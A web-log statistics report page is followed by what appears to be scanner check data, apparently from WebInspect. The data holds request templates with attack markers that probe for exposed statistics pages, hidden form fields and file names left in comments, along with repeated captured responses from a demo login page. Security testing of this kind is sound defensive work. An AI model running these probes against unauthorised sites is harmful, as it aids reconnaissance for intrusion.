<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Suffix (Domain Name)</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The three digit suffix of a domain can be used to identify the type of organization.
<DL><DT>Possible "Suffixes" are:
<DD>.com = Commercial
<DD>.edu = Educational
<DD>.int = International
<DD>.gov = Government
<DD>.mil = Military
<DD>.net = Network
<DD>.org = Organization</DL></TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>User Agent</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Fields in an extended Web server log file identifying the browser and platform used by a visitor.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>URL</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Uniform Resource Locator is a means of identifying an exact location on the Internet. For example, http://www.webtrends.com/html/info/default.htm is the URL which defines the use of HTTP to access the Web page Default.htm in the /html/info/ directory on the WebTrends Corporation Web site). As the previous example shows, a URL is comprised of four parts: Protocol Type (HTTP), Machine Name (webtrends.com), Directory Path (/html/info/), and File Name (default.htm).</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>User Session</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A session of activity (all hits) for one user of a web site. A unique user is determined by the IP address or cookie. By default, a user session is terminated when a user is inactive for more than 30 minutes. This duration can be changed from General panel in the Options, Web Log Analysis dialog. Synonym: Visit.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>View,Page</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Each request for a particular web page which displays an ad. Also referred to as an impression.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Visit</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Commonly called User Session. All activity for one user of a web site. By default, a user session is terminated when a user is inactive for more than 30 minutes.</TD></TR>
</TABLE>
<!-- GLOSSARY_END -->
</FONT>
<!-- ----------------- ------------- -->
-- ----------------- ------------- -->
<!-- ----------------- ------------- -->
<!-- WT_H1>MicroNetix Corporation</WT_H1 -->
<!-- WT_CRLF -->
<!-- WT_CENTER>This report was generated by MicroNetix Corp.</WT_CENTER -->
<!-- WT_END_STRIP -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000">
<CENTER>
<br><br><a href="http://www.MicroNetix.com">
<img border=0 src="mlogo.gif" alt="MicroNetix Corporation"></a><P>
This report was generated by <A HREF="http://www.MicroNetix.com">MicroNetix Corp</A>.
</CENTER>
</FONT>
<BR>
<BR>
<html>
<head>
<title></title>
<script LANGUAGE=JavaScript1.2>
<!-- browser info object
function BrowserInfo() {
var agent = navigator.userAgent.toLowerCase();
this.major = parseInt(navigator.appVersion);
this.minor = parseFloat(navigator.appVersion);
this.ns = ((agent.indexOf('mozilla')!=-1) && ((agent.indexOf('spoofer')==-1) && (agent.indexOf('compatible') == -1)));
this.ns2 = (this.ns && (this.major == 3));
this.ns3 = (this.ns && (this.major == 3));
this.ns4 = (this.ns && (this.major >= 4));
this.ie = (agent.indexOf("msie") != -1);
this.ie3 = (this.ie && (this.major == 2));
this.ie4 = (this.ie && (this.major >= 4));
this.op3 = (agent.indexOf("opera") != -1);
}
var browserinfo = new BrowserInfo()
// -->
</script>
<script LANGUAGE=javascript>
<!-- toc data
function anItem(alink,adesc)
{
this.alink = alink
this.adesc = adesc
}
var VOLUMES = new Array
var CHAPTERS = new Array
var ITEMS = new Array
var bExpanded = true; // is tree initially expanded completely
var bLoaded = false; // tree is ready
var width = 400;
var height = 18;
var MAX_ITEMS = VOLUMES.length + ITEMS.length
var SPACER_HEIGHT = (MAX_ITEMS + 4) * height // allow space for toc to expand when all nodes visible
var listX = 2 // start x of list
var listY = 20 // start y of list
var bgColor = "#FFFFFF";
if(parseInt(navigator.appVersion) < 4)
{
var item = 0
var alink = ""
var adesc = ""
with (window.document)
{
writeln('<body bgcolor="#FFFFFF">')
writeln('<font size=3 face="Arial" color="#000000" ><b>Table of Contents</b></font>');
writeln('<BR>');
writeln('<BR>');
writeln('<table border=0 cellpadding=0 cellspacing=0>');
for (var volume = 1; volume <= (VOLUMES.length-1); volume++)
{
writeln('<TR>')
write(' <TD colspan=2><font size=2 face="Arial"><a href="' + VOLUMES[volume].alink + '" target="CONTENT"><b>' + VOLUMES[volume].adesc + '</b></a></font></td>')
writeln('</TR>')
for (var chapters=1; chapters <= CHAPTERS[volume]; chapters++)
{
item += 1
alink = ITEMS[item].alink
adesc = ITEMS[item].adesc
writeln('<tr>')
write(' <td valign=top><font size=1 face="Arial"><B> • </B></TD>')
write(' <td><font size=1 face="Arial"><a href="' + alink + '" target="CONTENT"><b>' + adesc + '</b></a></font></td>')
writeln('</tr>')
}
writeln('<tr>')
write(' <td colspan=2><font size=2 face="Arial"> </font></td>')
writeln('</tr>')
}
writeln('</table>');
writeln('</body>')
}
}
// -->
</script>
<script LANGUAGE=JavaScript1.2>
<!-- browser info object
// resize and list functions
if(!window.saveInnerWidth) {
window.onresize = resize;
window.saveInnerWidth = window.innerWidth;
window.saveInnerHeight = window.innerHeight;
}
function resize() {
if (saveInnerWidth < window.innerWidth ||
saveInnerWidth > window.innerWidth ||
saveInnerHeight > window.innerHeight ||
saveInnerHeight < window.innerHeight )
{
window.history.go(0);
}
}
var _id = 0, _pid = 0, _lid = 0, _pLayer;
var _mLists = new Array();
document.lists = _mLists;
// adapted DevEdge Online sample code :author Michael Bostock
function List(visible, width, height, bgColor) {
this.setIndent = setIndent;
this.addItem = addItem;
this.addList = addList;
this.build = build;
this.rebuild = rebuild;
this.setFont = _listSetFont;
this._writeList = _writeList;
this._showList = _showList;
this._updateList = _updateList;
this._updateParent = _updateParent;
this.onexpand = null; this.postexpand = null;
this.lists = new Array();
this.items = new Array();
this.types = new Array();
this.strs = new Array();
this.x = 0;
this.y = 0;
this.visible = visible;
this.id = _id;
this.i = 18;
this.space = true;
this.pid = 0;
this.fontIntro = false;
this.fontOutro = false;
this.width = width;
this.height = height;
this.parLayer = false;
this.built = false;
this.shown = false;
this.needsUpdate = false;
this.needsRewrite = false;
this.parent = null;
this.l = 0;
if(bgColor) this.bgColor = bgColor;
else this.bgColor = null;
_mLists[_id++] = this;
}
function _listSetFont(i,j) {
this.fontIntro = i;
this.fontOutro = j;
}
function setIndent(indent) { this.i = indent; if(this.i < 0) { this.i = 0; this.space = false;} this.space = false; }
function setClip(layer, l, r, t, b) {
if(browserinfo.ns4) {
layer.clip.left = l; layer.clip.right = r;
layer.clip.top = t; layer.clip.bottom = b;
} else {
layer.style.pixelWidth = r-l;
layer.style.pixelHeight = b-t;
layer.style.clip = "rect("+t+","+r+","+b+","+l+")";
}
}
function _writeList() {
var layer, str, clip;
for(var i = 0; i < this.types.length; i++) {
layer = this.items[i];
if(browserinfo.ns4) layer.visibility = "hidden";
else layer.style.visibility = "hidden";
str = "";
if(browserinfo.ns4) layer.document.open();
str += "<form name=reptoc><TABLE bgcolor=#FFFFFF WIDTH="+this.width+" BORDER=0 CELLPADDING=0 CELLSPACING=0><TR>";
if(this.types[i] == "list") {
str += "<TD WIDTH=15 VALIGN=MIDDLE><A HREF=\"javascript:expand("+this.lists[i].id+");\"><IMG BORDER=0 SRC=\"true.gif\" NAME=\"_img"+this.lists[i].id+"\"></A></TD>";
_pid++;
} else if(this.space)
str += "<TD WIDTH=15 > </TD>";
if(this.l>0 && this.i>0) str += "<TD WIDTH="+this.l*this.i+" > </TD>";
str += "<TD HEIGHT="+(this.height-3)+" WIDTH="+(this.width-15-this.l*this.i)+" VALIGN=MIDDLE ALIGN=LEFT>";
self.status = "Table of Contents: " + ITEMS[i+1].adesc
if(this.fontIntro) str += this.fontIntro;
str += this.strs[i];
if(this.fontOutro) str += this.fontOutro;
str += "</TD></TABLE></form>";
if(browserinfo.ns4) {
layer.document.writeln(str);
layer.document.close();
} else layer.innerHTML = str;
if(this.types[i] == "list" && this.lists[i].visible)
this.lists[i]._writeList();
}
this.built = true;
this.needsRewrite = false;
self.status = '';
}
function _showList() {
var layer;
for(var i = 0; i < this.types.length; i++) {
layer = this.items[i];
setClip(layer, 0, this.width, 0, this.height-1);
if(browserinfo.ie4) {
if(layer.oBgColor) layer.style.backgroundColor = layer.oBgColor;
else layer.style.backgroundColor = this.bgColor;
} else {
if(layer.oBgColor) layer.document.bgColor = layer.oBgColor;
else layer.document.bgColor = this.bgColor;
}
if(this.types[i] == "list" && this.lists[i].visible)
this.lists[i]._showList();
}
this.shown = true;
this.needsUpdate = false;
}
function _updateList(pVis, x, y) {
var currTop = y, layer;
for(var i = 0; i < this.types.length; i++) {
layer = this.items[i];
if(this.visible && pVis) {
if(browserinfo.ns4) {
layer.visibility = "visible";
layer.top = currTop;
layer.left = x;
} else {
layer.style.visibility = "visible";
layer.style.pixelTop = currTop;
layer.style.pixelLeft = x;
}
currTop += this.height;
} else {
if(browserinfo.ns4) layer.visibility = "hidden";
else layer.style.visibility = "hidden";
}
if(this.types[i] == "list") {
if(this.lists[i].visible) {
if(!this.lists[i].built || this.lists[i].needsRewrite) this.lists[i]._writeList();
if(!this.lists[i].shown || this.lists[i].needsUpdate) this.lists[i]._showList();
if(browserinfo.ns4) layer.document.images[0].src = "true.gif";
else eval('document.images._img'+this.lists[i].id+'.src = "true.gif"');
} else {
if(browserinfo.ns4) layer.document.images[0].src = "false.gif";
else eval('document.images._img'+this.lists[i].id+'.src = "false.gif"');
}
if(this.lists[i].built)
currTop = this.lists[i]._updateList(this.visible && pVis, x, currTop);
}
}
return currTop;
}
function _updateParent(pid, l) {
var layer;
if(!l) l = 0;
this.pid = pid;
this.l = l;
for(var i = 0; i < this.types.length; i++)
if(this.types[i] == "list")
this.lists[i]._updateParent(pid, l+1);
}
function expand(i) {
_mLists[i].visible = !_mLists[i].visible;
if(_mLists[i].onexpand != null) _mLists[i].onexpand(_mLists[i].id);
_mLists[_mLists[i].pid].rebuild();
if(_mLists[i].postexpand != null) _mLists[i].postexpand(_mLists[i].id);
}
function build(x, y) {
this._updateParent(this.id);
this._writeList();
this._showList();
this._updateList(true, x, y);
this.x = x; this.y = y;
}
function rebuild() { this._updateList(true, this.x, this.y); }
function addItem(str, bgColor, layer) {
var testLayer = false;
if(!document.all) document.all = document.layers;
if(!layer) {
if(browserinfo.ie4 || !this.parLayer) testLayer = eval('document.all.lItem'+_lid);
else {
_pLayer = this.parLayer;
testLayer = eval('_pLayer.document.layers.lItem'+_lid);
}
if(testLayer) layer = testLayer;
else {
if(browserinfo.ns4) {
if(this.parLayer) layer = new Layer(this.width, this.parLayer);
else layer = new Layer(this.width);
} else return;
}
}
if(bgColor) layer.oBgColor = bgColor;
this.items[this.items.length] = layer;
this.types[this.types.length] = "item";
this.strs[this.strs.length] = str;
_lid++;
}
function addList(list, str, bgColor, layer) {
var testLayer = false;
if(!document.all) document.all = document.layers;
if(!layer) {
if(browserinfo.ie4 || !this.parLayer) testLayer = eval('document.all.lItem'+_lid);
else {
_pLayer = this.parLayer;
testLayer = eval('_pLayer.document.layers.lItem'+_lid);
}
if(testLayer) layer = testLayer;
else {
if(browserinfo.ns4) {
if(this.parLayer) layer = new Layer(this.width, this.parLayer);
else layer = new Layer(this.width);
} else return;
}
}
if(bgColor) layer.oBgColor = bgColor;
this.lists[this.items.length] = list;
this.items[this.items.length] = layer;
this.types[this.types.length] = "list";
this.strs[this.strs.length] = str;
list.parent = this;
_lid++;
}
document.vlinkColor = document.linkColor
document.alinkColor = document.linkColor
document.linkColor = document.linkColor
var onit = new Image()
var ofit = new Image()
var cursel = new Image()
onit.src = "tocarw.gif"
ofit.src = "tocclr.gif"
cursel.src = "tocsel.gif"
var curlink = null
var prvlink = null
// List initialization
var subvar = new Array()
var image = 0
var vol = 0
var sublist = null
var l = new List(true, width, height, bgColor);
l.setFont("<FONT FACE='Arial' SIZE=-1'>","</FONT>");
function imgover(id){
if (browserinfo.ns4){
var objstr = "document.layers[" + id + "].document.reptoc.wt" + id
img = eval(objstr)
}
else{
img = eval("document.wt" + id)
}
if (curlink && img == curlink)
img.src = cursel.src
else
img.src = onit.src
}
function imgout(id){
var img
if (browserinfo.ns4){
var objstr = "document.layers[" + id + "].document.reptoc.wt" + id
img = eval(objstr)
}
else
img = eval("document.wt" + id)
if (curlink && img == curlink)
img.src = cursel.src
else
img.src = ofit.src
}
function currentVol()
{
if (prvlink)
prvlink.src = ofit.src
}
function current(id, bVolume)
{
if (browserinfo.ns4){
var objstr = "document.layers[" + id + "].document.reptoc.wt" + id
img = eval(objstr)
}
else
img = eval("document.wt" + id)
if (img && img != curlink){
curlink = img
if ( !bVolume )
curlink.src = cursel.src
if (prvlink)
prvlink.src = ofit.src
prvlink = curlink
}
}
function subnode(numElements){
this.list = new List(bExpanded, width, height, bgColor);
this.numElements = numElements
}
function initsublist()
{
sublist = new subnode(0)
sublist.list.setIndent(0);
sublist.list.setFont("<FONT FACE='Arial' SIZE=-2>","</FONT>");
cursublist = sublist
return sublist
}
function addsubitem(reportlink,reportdesc)
{
image++
cursublist.numElements++
cursublist.list.addItem("<nobr><img name=wt" + image + " src='tocclr.gif'><a href='" + reportlink + "' style='text-decoration:none' TARGET='CONTENT' onClick='current(" + image + ");return true;' onMouseOver='imgover(" + image + ");return true;' onMouseOut='imgout(" + image + ");return true;'> <font face='Arial'>" + reportdesc + "</font></A></nobr>");
}
function addvolume(vollink,voldesc)
{
vol++
image++
l.addList(cursublist.list, "<nobr><A HREF='" + vollink + "' TARGET='CONTENT' onClick='currentVol();return true;' style='color:#000000;text-decoration:none'>" + voldesc + "</a>");
}
function expandAll() {
if (bLoaded)
{
for (var i=1; i < l.types.length +1; i++)
{
_mLists[i].visible = true
if(_mLists[i].onexpand != null)
_mLists[i].onexpand(_mLists[i].id);
_mLists[_mLists[i].pid].rebuild();
if(_mLists[i].postexpand != null)
_mLists[i].postexpand(_mLists[i].id);
}
}
}
function collapseAll() {
if (bLoaded)
{
for (var i=1; i < l.types.length +1; i++)
{
_mLists[i].visible = false
if(_mLists[i].onexpand != null)
_mLists[i].onexpand(_mLists[i].id);
_mLists[_mLists[i].pid].rebuild();
if(_mLists[i].postexpand != null)
_mLists[i].postexpand(_mLists[i].id);
}
}
}
function init()
{
var item = 0
for (var volume = 1; volume <= (VOLUMES.length-1); volume++)
{
subvar[vol] = initsublist();
for (var chapters=1; chapters <= CHAPTERS[volume]; chapters++)
{
item++
subvar[vol] = addsubitem(ITEMS[item].alink, ITEMS[item].adesc)
}
addvolume(VOLUMES[volume].alink, VOLUMES[volume].adesc)
}
l.build(listX,listY);
bLoaded = true
}
// -->
</script>
<script language=javascript1.2>
<!--
var TOC_HTML
TOC_HTML = '<style TYPE="text/css">'
TOC_HTML += '#spacer {margin-top:0;position: absolute; height:' + SPACER_HEIGHT + ';z-index: 0}'
TOC_HTML += 'BODY {margin-top:1; margin-left:2; background-color:#FFFFFF;}'
for (var i=0; i <= MAX_ITEMS; i++)
{
TOC_HTML += '#lItem' + i + ' { position:absolute; }'
}
TOC_HTML += '</style>'
TOC_HTML += '<body marginHeight=1 marginWidth=2 bgcolor="#FFFFFF" onLoad="init();">'
if (browserinfo.ns4)
{
TOC_HTML += '<form name=frmtoc>'
TOC_HTML += '<a href="javascript:expandAll();"><img width=22 height=14 name=treExp valign=top border=0 alt="Expand all sections" src="expall.gif"></a>'
TOC_HTML += '<a href="javascript:collapseAll();"><img width=22 height=14 name=treCol valign=top border=0 alt="Collapse all sections" src="collall.gif"></a>'
TOC_HTML += '</form>'
}
else
{
TOC_HTML += '<img style="cursor:hand" onClick="expandAll();" width=22 height=14 border=0 alt="Expand all sections" src="expall.gif">'
TOC_HTML += '<img style="cursor:hand" onClick="collapseAll();" width=22 height=14 border=0 alt="Collapse all sections" src="collall.gif">'
}
TOC_HTML += '<div ID="spacer"></div>'
for (var i=0; i <= MAX_ITEMS; i++)
{
TOC_HTML += '<div ID="lItem' + i + '" name="lItem' + i + '"></div>'
}
document.writeln( TOC_HTML )
// -->
</script>
</head>
</HTML>
Server Statistics Information Disclosure (stats.htm)A WebSite statistics page was found.GET /stats/<attack>stats.html</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |40[1]GET /adcenter.cgi HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:18 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT
ETag: "f2f6c2c1a8dc11:8f6"
Content-Length: 3118
<HTML>
<HEAD>
<TITLE>AdCenter Login Page</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" LINK="#0000FF" VLINK="#0000FF">
<CENTER>
<TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0 BGCOLOR="#33CC99">
<TR>
<TD>
<IMG SRC="http://www.heardinthehive.com/adimages/account_header.gif" WIDTH="625" HEIGHT="45" BORDER=0>
</TD>
</TR>
</TABLE>
<TABLE CELLPADDING=4 CELLSPACING=0 WIDTH=625 BORDER=0 BGCOLOR="#33CC99">
<TR>
<TD>
<CENTER>
<iframe src="http://pluto.adcycle.com/go/adcycle.cgi?group=1&media=1&id=681&delivery=iframe" height=60 width=468 border=0 marginheight=0 scrolling=no marginwidth=0 frameborder=no>
<a href="http://pluto.adcycle.com/go/adclick.cgi?manager=adcycle.com&id=681" target="_top"><img src="http://pluto.adcycle.com/go/adcycle.cgi?group=1&media=1&id=681" width=468 height=60 border=1 ALT="Click to Visit"></a>
</iframe><BR>
</CENTER>
</TD>
</TR>
</TABLE>
<TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0>
<TR>
<TD BGCOLOR="#33CC99" VALIGN="TOP">
<IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=55><BR>
</TD>
<TD>
<IMG SRC="http://www.heardinthehive.com/adimages/top_blend.gif" WIDTH=585 HEIGHT=15><BR>
<TABLE CELLPADDING=20 CELLSPACING=0 width="100%" BORDER=0>
<TR>
<TD BGCOLOR="#FFFFFF">
<BR>
<FORM NAME="form1" ACTION="http://www.heardinthehive.com/cgi-bin/adcycle/adcenter.cgi" METHOD="GET">
<TABLE CELLPADDING=3 CELLSPACING=0 BORDER=0 BGCOLOR="000000">
<TR>
<TD ALIGN=LEFT WIDTH=95%>
<FONT FACE="VERDANA,ARIAL" SIZE=2 COLOR="WHITE"><STRONG> Account Login</STRONG></FONT>
</TD>
</TR>
<TR>
<TD BGCOLOR="FFFFFF">
<FONT FACE="VERDANA,ARIAL" SIZE=2>
User Name: <FONT FACE="VERDANA,ARIAL" SIZE=3><INPUT TYPE="TEXT" NAME="account" VALUE="" SIZE=14></FONT><BR>
<IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=1 HEIGHT=4><BR>
<FONT FACE="VERDANA,ARIAL" SIZE=2>
Password: <FONT FACE="VERDANA,ARIAL" SIZE=3><INPUT TYPE="PASSWORD" NAME="pwd" VALUE="" SIZE=12></FONT><BR>
<FONT SIZE=2 FACE="VERDANA,ARIAL"><b>
<BR>
<INPUT TYPE="SUBMIT" NAME="change" VALUE="Login">
</TD>
</TR>
</TABLE>
<INPUT TYPE="HIDDEN" NAME="cache" VALUE="681">
</FORM>
<SCRIPT LANGUAGE="JavaScript">
<!--
var MC=document.cookie;
var temp;
if(MC){
var start=MC.indexOf("!!");
var end=MC.indexOf("!!",start+2);
temp=MC.substring(start+2,end);
if(temp.length > 1 && temp.length < 20){
document.form1.account.value=temp;
}
}
// -->
</SCRIPT>
<BR>
</TD>
</TR>
</TABLE>
<IMG SRC="http://www.heardinthehive.com/adimages/bottom_blend.gif" WIDTH=585 HEIGHT=15><BR>
</TD>
<TD BGCOLOR="#33CC99"><IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=1><BR></TD>
</TR>
</TABLE>
<IMG SRC="http://www.heardinthehive.com/adimages/account_footer.gif" WIDTH=625 HEIGHT=25><BR>
<TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0>
<TR>
<TD align=right>
<font face=arial size=1>powered by <a href="http://www.adcycle.com">adcycle.com</a> v0.77b <IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=1><BR>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
Hidden Form ValueThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires that hidden form fields are checked. Webinspect has detected that the URL <B> ~FullURL~ </b>has failed this policy.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
GET /adcenter.cgi HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:18 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT
ETag: "f2f6c2c1a8dc11:8f6"
Content-Length: 3118
<HTML>
<HEAD>
<TITLE>AdCenter Login Page</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" LINK="#0000FF" VLINK="#0000FF">
<CENTER>
<TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0 BGCOLOR="#33CC99">
<TR>
<TD>
<IMG SRC="http://www.heardinthehive.com/adimages/account_header.gif" WIDTH="625" HEIGHT="45" BORDER=0>
</TD>
</TR>
</TABLE>
<TABLE CELLPADDING=4 CELLSPACING=0 WIDTH=625 BORDER=0 BGCOLOR="#33CC99">
<TR>
<TD>
<CENTER>
<iframe src="http://pluto.adcycle.com/go/adcycle.cgi?group=1&media=1&id=681&delivery=iframe" height=60 width=468 border=0 marginheight=0 scrolling=no marginwidth=0 frameborder=no>
<a href="http://pluto.adcycle.com/go/adclick.cgi?manager=adcycle.com&id=681" target="_top"><img src="http://pluto.adcycle.com/go/adcycle.cgi?group=1&media=1&id=681" width=468 height=60 border=1 ALT="Click to Visit"></a>
</iframe><BR>
</CENTER>
</TD>
</TR>
</TABLE>
<TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0>
<TR>
<TD BGCOLOR="#33CC99" VALIGN="TOP">
<IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=55><BR>
</TD>
<TD>
<IMG SRC="http://www.heardinthehive.com/adimages/top_blend.gif" WIDTH=585 HEIGHT=15><BR>
<TABLE CELLPADDING=20 CELLSPACING=0 width="100%" BORDER=0>
<TR>
<TD BGCOLOR="#FFFFFF">
<BR>
<FORM NAME="form1" ACTION="http://www.heardinthehive.com/cgi-bin/adcycle/adcenter.cgi" METHOD="GET">
<TABLE CELLPADDING=3 CELLSPACING=0 BORDER=0 BGCOLOR="000000">
<TR>
<TD ALIGN=LEFT WIDTH=95%>
<FONT FACE="VERDANA,ARIAL" SIZE=2 COLOR="WHITE"><STRONG> Account Login</STRONG></FONT>
</TD>
</TR>
<TR>
<TD BGCOLOR="FFFFFF">
<FONT FACE="VERDANA,ARIAL" SIZE=2>
User Name: <FONT FACE="VERDANA,ARIAL" SIZE=3><INPUT TYPE="TEXT" NAME="account" VALUE="" SIZE=14></FONT><BR>
<IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=1 HEIGHT=4><BR>
<FONT FACE="VERDANA,ARIAL" SIZE=2>
Password: <FONT FACE="VERDANA,ARIAL" SIZE=3><INPUT TYPE="PASSWORD" NAME="pwd" VALUE="" SIZE=12></FONT><BR>
<FONT SIZE=2 FACE="VERDANA,ARIAL"><b>
<BR>
<INPUT TYPE="SUBMIT" NAME="change" VALUE="Login">
</TD>
</TR>
</TABLE>
<INPUT TYPE="HIDDEN" NAME="cache" VALUE="681">
</FORM>
<SCRIPT LANGUAGE="JavaScript">
<!--
var MC=document.cookie;
var temp;
if(MC){
var start=MC.indexOf("!!");
var end=MC.indexOf("!!",start+2);
temp=MC.substring(start+2,end);
if(temp.length > 1 && temp.length < 20){
document.form1.account.value=temp;
}
}
// -->
</SCRIPT>
<BR>
</TD>
</TR>
</TABLE>
<IMG SRC="http://www.heardinthehive.com/adimages/bottom_blend.gif" WIDTH=585 HEIGHT=15><BR>
</TD>
<TD BGCOLOR="#33CC99"><IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=1><BR></TD>
</TR>
</TABLE>
<IMG SRC="http://www.heardinthehive.com/adimages/account_footer.gif" WIDTH=625 HEIGHT=25><BR>
<TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0>
<TR>
<TD align=right>
<font face=arial size=1>powered by <a href="http://www.adcycle.com">adcycle.com</a> v0.77b <IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=1><BR>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
GET /adcenter.cgi HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:18 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT
ETag: "f2f6c2c1a8dc11:8f6"
Content-Length: 3118
<HTML>
<HEAD>
<TITLE>AdCenter Login Page</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" LINK="#0000FF" VLINK="#0000FF">
<CENTER>
<TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0 BGCOLOR="#33CC99">
<TR>
<TD>
<IMG SRC="http://www.heardinthehive.com/adimages/account_header.gif" WIDTH="625" HEIGHT="45" BORDER=0>
</TD>
</TR>
</TABLE>
<TABLE CELLPADDING=4 CELLSPACING=0 WIDTH=625 BORDER=0 BGCOLOR="#33CC99">
<TR>
<TD>
<CENTER>
<iframe src="http://pluto.adcycle.com/go/adcycle.cgi?group=1&media=1&id=681&delivery=iframe" height=60 width=468 border=0 marginheight=0 scrolling=no marginwidth=0 frameborder=no>
<a href="http://pluto.adcycle.com/go/adclick.cgi?manager=adcycle.com&id=681" target="_top"><img src="http://pluto.adcycle.com/go/adcycle.cgi?group=1&media=1&id=681" width=468 height=60 border=1 ALT="Click to Visit"></a>
</iframe><BR>
</CENTER>
</TD>
</TR>
</TABLE>
<TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0>
<TR>
<TD BGCOLOR="#33CC99" VALIGN="TOP">
<IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=55><BR>
</TD>
<TD>
<IMG SRC="http://www.heardinthehive.com/adimages/top_blend.gif" WIDTH=585 HEIGHT=15><BR>
<TABLE CELLPADDING=20 CELLSPACING=0 width="100%" BORDER=0>
<TR>
<TD BGCOLOR="#FFFFFF">
<BR>
<FORM NAME="form1" ACTION="http://www.heardinthehive.com/cgi-bin/adcycle/adcenter.cgi" METHOD="GET">
<TABLE CELLPADDING=3 CELLSPACING=0 BORDER=0 BGCOLOR="000000">
<TR>
<TD ALIGN=LEFT WIDTH=95%>
<FONT FACE="VERDANA,ARIAL" SIZE=2 COLOR="WHITE"><STRONG> Account Login</STRONG></FONT>
</TD>
</TR>
<TR>
<TD BGCOLOR="FFFFFF">
<FONT FACE="VERDANA,ARIAL" SIZE=2>
